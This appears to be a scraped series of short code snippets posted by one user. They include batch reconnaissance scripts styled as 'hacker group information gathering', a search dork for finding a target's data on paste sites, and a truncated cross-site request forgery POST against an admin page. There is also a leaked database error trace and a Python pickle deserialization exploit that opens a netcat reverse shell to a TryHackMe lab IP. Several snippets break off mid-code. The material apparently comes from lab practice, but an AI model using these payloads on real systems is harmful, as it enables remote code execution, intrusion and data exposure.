Zinkuth

@echo off

echo BillBug Hacker Group 
echo INFORMATION GATHERING
echo IN PROGRESS...........................

net user
echo ================================================================

ipconfig -all

Zinkuth

@echo off

echo Lazarus/Appleworm Hacker Group 
echo INFORMATION GATHERING
echo IN PROGRESS...........................

hostname
echo ================================================================

whoami

Zinkuth

@echo off

echo WaterBug Hacker Group 
echo INFORMATION GATHERING
echo IN PROGRESS...........................

Rem Displays complete system information
systeminfo
echo ================================================================

Zinkuth

Dork:

site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:justpaste.it | site:pastebin.com | site:jsfiddle.net | site:trello.com | site:*.attlasian.net "$TARGET"

Zinkuth

import time
from selenium.webdriver import Firefox
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.common.keys import Keys

# Configure the browser
options = Options()
options.set_headless()
assert options.headless
my_browser = Firefox(options=options)

Zinkuth

import wx
from wx import html
 
from urllib import request
 
class MyHTMLFrame(wx.Frame):
	def __init__(self, parent, title, haxedpage):
		wx.Frame.__init__(
			self,

Zinkuth

<html>
  <body>
    <script type="text/javascript">
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://172.17.0.2/sns/news/admin/inserisci.php", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------40332906111198093676802403210");

Zinkuth

Test Results
PDOException: SQLSTATE[HY000] [1045] Access denied for user 'auieoadm_rcversi'@'localhost' (using password: YES) in /var/www/html/candid-ats/lib/ClsNaanalPDO.php:45 
Stack trace: 
 #0 /var/www/html/candid-ats/lib/ClsNaanalPDO.php(45): PDO->__construct() 
 #1 /var/www/html/candid-ats/lib/ClsNaanalPDO.php(485): ClsNaanalPDO->__construct() 
 #2 /var/www/html/candid-ats/lib/DatabaseConnectionPDO.php(98): ClsNaanalPDO::getNamedInstance() 
 #3 /var/www/html/candid-ats/lib/DatabaseConnectionPDO.php(45): DatabaseConnection->connect() 
 #4 /var/www/html/candid-ats/lib/InstallationTests.php(334): DatabaseConnection::getInstance() 
 #5 /var/www/html/candid-ats/modules/install/ajax/ui.php(254): InstallationTests::checkMySQL() 
 #6 /var/www/html/candid-ats/ajax.php(130): include('/var/www/html/c...') 

Zinkuth

"""
You can run this in the following format:
For decimal: python3 ip2dh.py D <Ip-address>
For Hexadecimal: python3 ip2dh.py H <Ip-address>
"""
#!/usr/bin/python3

import sys

if len(sys.argv) < 3:

Zinkuth

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))